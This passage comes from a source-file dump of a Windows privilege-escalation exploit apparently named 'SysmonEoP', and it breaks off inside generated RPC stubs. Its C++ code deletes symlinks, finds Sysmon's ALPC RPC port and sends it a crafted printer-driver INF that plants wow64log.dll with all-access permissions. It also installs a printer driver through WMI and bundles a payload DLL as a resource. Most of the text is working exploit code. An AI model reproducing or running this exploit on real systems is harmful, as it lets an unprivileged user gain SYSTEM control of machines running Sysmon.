printf(\"[+] Symlink %ls -> %ls deleted!\\n\", object, target);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n        printf(\"error :%d\\n\", GetLastError());\r\n        return FALSE;\r\n\r\n\r\n    }\r\n}\r\n\r\nLPWSTR Find() {\r\n    HANDLE rpccontrolobj;\r\n    OBJECT_ATTRIBUTES obj;\r\n    const wchar_t rpccontrol[] = L\"\\\\RPC Control\";\r\n    UNICODE_STRING unicode_string = { 0 };\r\n    pRtlInitUnicodeString(&unicode_string, rpccontrol);\r\n    InitializeObjectAttributes(&obj, &unicode_string, 0, 0, 00);\r\n    NTSTATUS result = pNtOpenDirectoryObect(&rpccontrolobj, 0x0001 | 0x0002, &obj);\r\n    if (result == 0) {\r\n\r\n        BYTE* buffer = (BYTE*)malloc(100000);\r\n\r\n        ULONG start = 0, index = 0, bytes;\r\n        BOOLEAN restart = TRUE;\r\n        for (;;)\r\n        {\r\n            result = pNtQueryDirectoryObject(rpccontrolobj, (PBYTE)buffer, 100000, FALSE, restart, &index, &bytes);\r\n            if (result == 0)\r\n            {\r\n                POBJECT_DIRECTORY_INFORMATION objectlist = (POBJECT_DIRECTORY_INFORMATION)buffer;\r\n                for (ULONG i = 0; i < index - start; i++)\r\n                {\r\n                    if (0 == wcsncmp(objectlist[i].TypeName.Buffer, L\"ALPC Port\", objectlist[i].TypeName.Length / sizeof(WCHAR)))\r\n                    {\r\n                        if (wcsstr(objectlist[i].Name.Buffer, L\"syscliprpc\")) {\r\n                            return objectlist[i].Name.Buffer;\r\n\r\n                        }\r\n\r\n\r\n                    }\r\n                }\r\n            }\r\n            if (STATUS_MORE_ENTRIES == result)\r\n            {\r\n                start = index;\r\n                restart = FALSE;\r\n                continue;\r\n            }\r\n\r\n            else if (STATUS_NO_MORE_ENTRIES == 0 || (result == 0)) {\r\n                CloseHandle(rpccontrolobj);\r\n                break;\r\n\r\n\r\n\r\n            }\r\n        }\r\n        return NULL;\r\n    }\r\n    return NULL;\r\n}\r\n\r\nvoid Trigger(LPWSTR alpc)\r\n{\r\n    RPC_STATUS status;\r\n    RPC_WSTR StringBinding;\r\n    RPC_BINDING_HANDLE Binding;\r\n    wchar_t data[] = L\"; Windows Inbox Printer Drivers\\n\\n[Version]\\nSignature=\\\"$Windows NT$\\\"\\nProvider=\\\"Microsoft\\\"\\nClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}\\nClass=Printer\\nCatalogFile=prnge001.cat\\nDriverVer = 06/21/2006,10.0.19041.1\\n\\n\\n[Manufacturer]\\n\\\"Generic\\\"=Generic,NTamd64\\n\\n[Test.CopyFiles]\\nwow64log.dll,TTY.DLL,,4\\n\\n[Test.CopyFiles.security]\\n\\\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\\\"\\n\\n\\n[Generic.NTamd64]\\n\\\"Generic / Text Only\\\"                                         = TTY.GPD,GenericGeneric_/_Tex8040,Generic_/_Text_Only\\n\\\"Generic IBM Graphics 9pin\\\"                                   = GENIBM9.GPD,GenericGeneric_IBM_GD35A,Generic_IBM_Graphics_9pin\\n\\\"Generic IBM Graphics 9pin wide\\\"                              = GENIBM9W.GPD,GenericGeneric_IBM_GC7D5,Generic_IBM_Graphics_9pin_wide\\n\\\"MS Publisher Color Printer\\\"                                  = MSGENCOL.PPD,GenericMS_Publisher_25C7,MS_Publisher_Color_Printer\\n\\\"MS Publisher Imagesetter\\\"                                    = MSGENBW.PPD,GenericMS_Publisher_B397,MS_Publisher_Imagesetter\\n\\n\\n[TTY.GPD]\\nCopyFiles=@TTYRES.DLL,@TTY.INI,@TTY.DLL,@TTYUI.DLL,@TTY.GPD,@TTYUI.HLP\\nCopyFiles=Test.CopyFiles\\nDataFile=TTY.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[GENIBM9.GPD]\\nCopyFiles=@OK9IBRES.DLL,@GENIBM9.GPD\\nDataFile=GENIBM9.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[GENIBM9W.GPD]\\nCopyFiles=@OK9IBRES.DLL,@GENIBM9W.GPD\\nDataFile=GENIBM9W.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[MSGENCOL.PPD]\\nCopyFiles=@MSGENCOL.PPD\\nDataFile=MSGENCOL.PPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\\\"\\n\\n[MSGENBW.PPD]\\nCopyFiles=@MSGENBW.PPD\\nDataFile=MSGENBW.PPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\\\"\\n\\n[DestinationDirs]\\nDefaultDestDir=66000\\nTest.CopyFiles=11\\n\\n[SourceDisksFiles]\\nMSGENBW.PPD  = 1\\nTTY.DLL      = 1\\nTTYUI.HLP    = 1\\nGENIBM9W.GPD = 1\\nTTY.INI      = 1\\nMSGENCOL.PPD = 1\\nGENIBM9.GPD  = 1\\nOK9IBRES.DLL = 1\\nTTYUI.DLL    = 1\\nTTYRES.DLL   = 1\\nTTY.GPD      = 1\\n\\n[PrinterPackageInstallation.amd64]\\nPackageAware=TRUE\\nCoreDriverDependencies={D20EA372-DD35-4950-9ED8-A6335AFE79F0},{D20EA372-DD35-4950-9ED8-A6335AFE79F1}\\nInboxVersionRequired=UseDriverVer\\n\\n[Strings]\\n;Non-Localizable\\n\\n;Localizable\\nDisk1=\\\"Windows Installation Disc\\\"\\n\\n[SourceDisksNames.x86]\\n1   = %Disk1%,,,\\\"I386\\\"\\n\\n[SourceDisksNames.amd64]\\n1   = %Disk1%,,,\\\"Amd64\\\"\\n\\n[SourceDisksNames.ia64]\\n1   = %Disk1%,,,\\\"Ia64\\\"\\n\\n[SourceDisksNames.arm]\\n1   = %Disk1%,,,\\\"arm\\\"\\n\\n[SourceDisksNames.arm64]\\n1   = %Disk1%,,,\\\"arm64\\\"\\n\";\r\n    status = RpcStringBindingCompose(NULL, (RPC_WSTR)L\"ncalrpc\", NULL, (RPC_WSTR)alpc, NULL, &StringBinding);\r\n\r\n    status = RpcBindingFromStringBinding(StringBinding, &Binding);\r\n    status = RpcStringFree(&StringBinding);\r\n    RpcTryExcept\r\n    {\r\n        \r\n        Proc1(Binding, 3036,data);\r\n    }\r\n    RpcExcept(EXCEPTION_EXECUTE_HANDLER);\r\n    {\r\n        printf(\"Error: %d\\n\",RpcExceptionCode());\r\n    }\r\n    RpcEndExcept\r\n\r\n        status = RpcBindingFree(&Binding);\r\n}\r\n\r\n\r\n\r\nLPWSTR  BuildPath(LPCWSTR path) {\r\n    wchar_t ntpath[MAX_PATH];\r\n    swprintf(ntpath, L\"\\\\??\\\\%s\", path);\r\n    return ntpath;\r\n}\r\nBOOL AddPrinterDriverWmi() {\r\n    HRESULT hr;\r\n    hr = CoInitializeEx(0, COINIT_MULTITHREADED);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    IWbemLocator* pLoc = NULL;\r\n\r\n    hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);\r\n    if (FAILED(hr))\r\n    {\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    IWbemServices* pSvc = NULL;\r\n    hr = pLoc->ConnectServer(_bstr_t(L\"ROOT\\\\StandardCimv2\"), NULL, NULL, 0, NULL, 0, 0, &pSvc);\r\n    if (FAILED(hr)) {\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);\r\n    if (FAILED(hr)) {\r\n        pSvc->Release();\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n    }\r\n    BSTR MethodName = SysAllocString(L\"Add\");\r\n    BSTR ClassName = SysAllocString(L\"MSFT_PrinterDriver\");\r\n    IWbemClassObject* pClass = NULL;\r\n    hr = pSvc->GetObject(ClassName, 0, NULL, &pClass, NULL);\r\n    IWbemClassObject* pInParamsDefinition = NULL;\r\n    hr = pClass->GetMethod(MethodName, 0, &pInParamsDefinition, NULL);\r\n    IWbemClassObject* pClassInstance = NULL;\r\n    hr = pInParamsDefinition->SpawnInstance(0, &pClassInstance);\r\n    VARIANT varCommand,varCommand2;\r\n    varCommand.vt = VT_BSTR;\r\n    varCommand.bstrVal = _bstr_t(L\"Generic / Text Only\");\r\n    varCommand2.vt = VT_BSTR;\r\n    varCommand2.bstrVal = _bstr_t(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\");\r\n    hr = pClassInstance->Put(L\"Name\", 0, &varCommand, 0);\r\n    hr = pClassInstance->Put(L\"InfPath\", 0, &varCommand2, 0);\r\n    IWbemClassObject* pOutParams = NULL;\r\n    hr = pSvc->ExecMethod(ClassName, MethodName, 0, NULL, pClassInstance, &pOutParams, NULL);\r\n\r\n    if (FAILED(hr))\r\n    {\r\n\r\n        VariantClear(&varCommand);\r\n        SysFreeString(ClassName);\r\n        SysFreeString(MethodName);\r\n        pClass->Release();\r\n        pClassInstance->Release();\r\n        pInParamsDefinition->Release();\r\n        pOutParams->Release();\r\n        pSvc->Release();\r\n        pLoc->Release();\r\n        CoUninitialize();\r\n        return FALSE;\r\n    }\r\n    return TRUE;\r\n}\r\nvoid __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)\r\n{\r\n    return((void __RPC_FAR*) malloc(cBytes));\r\n}\r\n\r\nvoid __RPC_USER midl_user_free(void __RPC_FAR* p)\r\n{\r\n    free(p);\r\n}"
  },
  {
    "path": "v1/SysmonEoP/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by FolderOrFileDeleteToSystem.rc\r\n//\r\n#define IDR_DLL1                        101\r\n\r\n// Next default values for new objects\r\n// \r\n#ifdef APSTUDIO_INVOKED\r\n#ifndef APSTUDIO_READONLY_SYMBOLS\r\n#define _APS_NEXT_RESOURCE_VALUE        107\r\n#define _APS_NEXT_COMMAND_VALUE         40001\r\n#define _APS_NEXT_CONTROL_VALUE         1001\r\n#define _APS_NEXT_SYMED_VALUE           101\r\n#endif\r\n#endif\r\n"
  },
  {
    "path": "v1/SysmonEoP/resource.rc",
    "content": "// Microsoft Visual C++ generated resource script.\r\n//\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 2 resource.\r\n//\r\n#include \"winres.h\"\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#undef APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n// English (United Kingdom) resources\r\n\r\n#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)\r\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK\r\n#pragma code_page(1252)\r\n\r\n#ifdef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE\r\n//\r\n\r\n1 TEXTINCLUDE\r\nBEGIN\r\n\"resource.h\\0\"\r\nEND\r\n\r\n2 TEXTINCLUDE\r\nBEGIN\r\n\"#include \"\"winres.h\"\"\\r\\n\"\r\n\"\\0\"\r\nEND\r\n\r\n3 TEXTINCLUDE\r\nBEGIN\r\n\"\\r\\n\"\r\n\"\\0\"\r\nEND\r\n\r\n#endif    // APSTUDIO_INVOKED\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// RBS\r\n//\r\n\r\nIDR_DLL1                DLL                     \"dll.dll\"\r\n\r\n\r\n#endif    // English (United Kingdom) resources\r\n/////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n#ifndef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// Generated from the TEXTINCLUDE 3 resource.\r\n//\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#endif    // not APSTUDIO_INVOKED\r\n"
  },
  {
    "path": "v1/SysmonEoP/sysmon.idl",
    "content": "[\r\n\tuuid(1e72d56f-eec6-44d3-bbed-5caa50790812),\r\n\tversion(1.0),\r\n]\r\ninterface DefaultIfName\r\n{\r\n\r\n\tlong Proc0(\r\n\t);\r\n\r\n\tvoid Proc1(\r\n\t\t[in]long arg_0,\r\n\t\t[in][string]  wchar_t* arg_1);\r\n}"
  },
  {
    "path": "v1/SysmonEoP/sysmon_c.c",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(push)\r\n#endif\r\n\r\n#pragma warning( disable: 4211 )  /* redefine extern to static */\r\n#pragma warning( disable: 4232 )  /* dllimport identity*/\r\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\r\n\r\n#include <string.h>\r\n\r\n#include \"sysmon_h.h\"\r\n\r\n#define TYPE_FORMAT_STRING_SIZE   7                                 \r\n#define PROC_FORMAT_STRING_SIZE   79                                \r\n#define EXPR_FORMAT_STRING_SIZE   1                                 \r\n#define TRANSMIT_AS_TABLE_SIZE    0            \r\n#define WIRE_MARSHAL_TABLE_SIZE   0            \r\n\r\ntypedef struct _sysmon_MIDL_TYPE_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_TYPE_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_PROC_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_PROC_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_EXPR_FORMAT_STRING\r\n    {\r\n    long          Pad;\r\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_EXPR_FORMAT_STRING;\r\n\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = \r\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = \r\n{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};\r\n\r\n\r\n\r\nextern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;\r\nextern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;\r\nextern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;\r\n\r\n#define GENERIC_BINDING_TABLE_SIZE   0            \r\n\r\n\r\n/* Standard interface: DefaultIfName, ver. 1.0,\r\n   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */\r\n\r\n extern const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo;\r\n\r\n\r\nstatic const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =\r\n    {\r\n    sizeof(RPC_CLIENT_INTERFACE),\r\n    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    &DefaultIfName_ProxyInfo,\r\n    0x02000000\r\n    };\r\nRPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;\r\n\r\nextern const MIDL_STUB_DESC DefaultIfName_StubDesc;\r\n\r\nstatic RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;\r\n\r\n\r\nlong Proc0( \r\n    /* [in] */ handle_t IDL_handle)\r\n{\r\n\r\n    CLIENT_CALL_RETURN _RetVal;\r\n\r\n    _RetVal = NdrClientCall3(\r\n                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,\r\n                  0,\r\n                  0,\r\n                  IDL_handle);\r\n    return ( long  )_RetVal.Simple;\r\n    \r\n}\r\n\r\n\r\nvoid Proc1( \r\n    /* [in] */ handle_t IDL_handle,\r\n    /* [in] */ long arg_0,\r\n    /* [string][in] */ wchar_t *arg_1)\r\n{\r\n\r\n    NdrClientCall3(\r\n                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,\r\n                  1,\r\n                  0,\r\n                  IDL_handle,\r\n                  arg_0,\r\n                  arg_1);\r\n    \r\n}\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\nstatic const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =\r\n    {\r\n        0,\r\n        {\r\n\r\n\t/* Procedure Proc0 */\r\n\r\n\t\t\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  8 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 14 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 18 */\t0x44,\t\t/* Oi2 Flags:  has return, has ext, */\r\n\t\t\t0x1,\t\t/* 1 */\r\n/* 20 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Return value */\r\n\r\n/* 30 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\r\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 34 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Procedure Proc1 */\r\n\r\n/* 36 */\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/* 38 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/* 42 */\tNdrFcShort( 0x1 ),\t/* 1 */\r\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\r\n/* 46 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 48 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 50 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 52 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 54 */\t0x42,\t\t/* Oi2 Flags:  clt must size, has ext, */\r\n\t\t\t0x2,\t\t/* 2 */\r\n/* 56 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 58 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 62 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 64 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Parameter arg_0 */\r\n\r\n/* 66 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\r\n/* 68 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 70 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Parameter arg_1 */\r\n\r\n/* 72 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\r\n/* 74 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 76 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =\r\n    {\r\n        0,\r\n        {\r\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  2 */\t\r\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\r\n/*  4 */\t\r\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\r\n\t\t\t0x5c,\t\t/* FC_PAD */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const unsigned short DefaultIfName_FormatStringOffsetTable[] =\r\n    {\r\n    0,\r\n    36\r\n    };\r\n\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n\r\n\r\n/* this ALWAYS GENERATED file contains the RPC client stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\n\r\n#include \"ndr64types.h\"\r\n#include \"pshpack8.h\"\r\n\r\n\r\ntypedef \r\nstruct _NDR64_CONFORMANT_STRING_FORMAT\r\n__midl_frag7_t;\r\nextern const __midl_frag7_t __midl_frag7;\r\n\r\ntypedef \r\nstruct _NDR64_POINTER_FORMAT\r\n__midl_frag6_t;\r\nextern const __midl_frag6_t __midl_frag6;\r\n\r\ntypedef \r\nNDR64_FORMAT_CHAR\r\n__midl_frag5_t;\r\nextern const __midl_frag5_t __midl_frag5;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n    struct _NDR64_PARAM_FORMAT frag4;\r\n}\r\n__midl_frag4_t;\r\nextern const __midl_frag4_t __midl_frag4;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n}\r\n__midl_frag2_t;\r\nextern const __midl_frag2_t __midl_frag2;\r\n\r\ntypedef \r\nNDR64_FORMAT_UINT32\r\n__midl_frag1_t;\r\nextern const __midl_frag1_t __midl_frag1;\r\n\r\nstatic const __midl_frag7_t __midl_frag7 =\r\n{ \r\n/* *wchar_t */\r\n    { \r\n    /* *wchar_t */\r\n        0x64,    /* FC64_CONF_WCHAR_STRING */\r\n        { \r\n        /* *wchar_t */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0\r\n        },\r\n        (NDR64_UINT16) 2 /* 0x2 */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag6_t __midl_frag6 =\r\n{ \r\n/* *wchar_t */\r\n    0x20,    /* FC64_RP */\r\n    (NDR64_UINT8) 0 /* 0x0 */,\r\n    (NDR64_UINT16) 0 /* 0x0 */,\r\n    &__midl_frag7\r\n};\r\n\r\nstatic const __midl_frag5_t __midl_frag5 =\r\n0x5    /* FC64_INT32 */;\r\n\r\nstatic const __midl_frag4_t __midl_frag4 =\r\n{ \r\n/* Proc1 */\r\n    { \r\n    /* Proc1 */      /* procedure Proc1 */\r\n        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */\r\n        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 2 /* 0x2 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* arg_0 */      /* parameter arg_0 */\r\n        &__midl_frag5,\r\n        { \r\n        /* arg_0 */\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [in], Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    },\r\n    { \r\n    /* arg_1 */      /* parameter arg_1 */\r\n        &__midl_frag7,\r\n        { \r\n        /* arg_1 */\r\n            1,\r\n            1,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* MustSize, MustFree, [in], SimpleRef */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        16 /* 0x10 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag2_t __midl_frag2 =\r\n{ \r\n/* Proc0 */\r\n    { \r\n    /* Proc0 */      /* procedure Proc0 */\r\n        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */\r\n        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 1 /* 0x1 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* long */      /* parameter long */\r\n        &__midl_frag5,\r\n        { \r\n        /* long */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            1,\r\n            1,\r\n            0,\r\n            